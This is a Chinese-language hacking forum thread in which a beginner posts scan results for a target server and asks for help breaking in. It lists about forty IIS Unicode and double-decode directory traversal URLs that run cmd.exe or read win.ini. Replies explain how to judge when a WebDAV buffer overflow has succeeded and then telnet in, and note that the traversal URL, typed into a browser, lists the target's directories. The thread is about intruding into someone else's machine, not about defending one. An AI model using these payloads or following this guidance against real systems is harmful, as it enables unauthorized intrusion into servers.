|
 | 作者: tianyecool [tianyecool]
 论坛用户 |
登录 |
| 这是我扫到的漏洞 开放端口 80 - HTTP, World Wide Web 25 - SMTP, Simple Mail Transfer Protocol 110 - Pop3, Post Office Protocol - Version 3 135 - Location Service 443 - HttpS, Secure HTTP CGI漏洞 /scripts/samples/search/qfullhit.htw /scripts/samples/search/qsumrhit.htw /null.ida /null.idq /_vti_inf.html /_vti_bin/shtml.dll/_vti_rpc /abczxv.htw /_vti_bin/fpcount.exe?Page=default.htm|Image=2|Digits=1 /_vti_bin/shtml.dll/nosuch.htm /_vti_bin/shtml.dll /_vti_bin/shtml.exe IIS漏洞 /_vti_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir /_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir /a.asp/..%c1%1c../..%c1%1c../winnt/win.ini /a.asp/..%c0%2f../..%c0%2f../winnt/win.ini /scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir /scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir /scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir /scripts/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c%20dir%20C:\ /scripts/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c%20dir%20C:\ /scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir /_vti_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir /_vti_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir /_vti_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir /scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir /scripts/..%%35%63../..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir /scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir /scripts/..%%35c../..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir /scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir /scripts/..%25%35%63../..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir /scripts/..%255c../..%255c../..%255cwinnt/system32/cmd.exe?/c+dir /scripts/..%255c../winnt/system32/cmd.exe?/c+dir /scripts/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c%20dir%20C:\ /scripts/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c%20dir%20C:\ /scripts/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c%20dir%20C:\ /scripts/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c%20dir%20C:\ /_vti_bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir /scripts/..%u00255c../winnt/system32/cmd.exe?/c+dir /scripts/..%u00255c../..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir /scripts/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c%20dir%20C:\ 可能存在"IIS .asp映射分块编码远程缓冲区溢出"漏洞 可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.ida) 可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.idq) 请问我用webdav溢出工具 可是偏移量不懂什么意思?出现什么情况中断开始telnet? |
| 地主 发表时间: 07/12 17:01 |
 | 回复: hacker521 [hacker521]  论坛用户 |
登录 |
|
WEBDAV溢出时,到4后,在两个个OFFSET之间出现英文的话就酸溢出了,可以终止溢出,用TELNET了 |
| B1层 发表时间: 07/13 07:27 |
 | 回复: sweet_day [sweet_day] 论坛用户 |
登录 |
|
/scripts/..255c../..255c../..255c../winnt/system32/cmd.exe?/c+dir 这个漏洞是unicode漏洞也叫目录遍历漏洞在IE中输入以上代码就可以看到对方的目录呵呵! |
| B2层 发表时间: 07/13 13:55 |
| 回复: tianyecool [tianyecool] 论坛用户 |
登录 |
|
可是他好像有防火墙,就是TELNET不上 |
| B3层 发表时间: 07/13 19:24 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: iis漏洞问题~~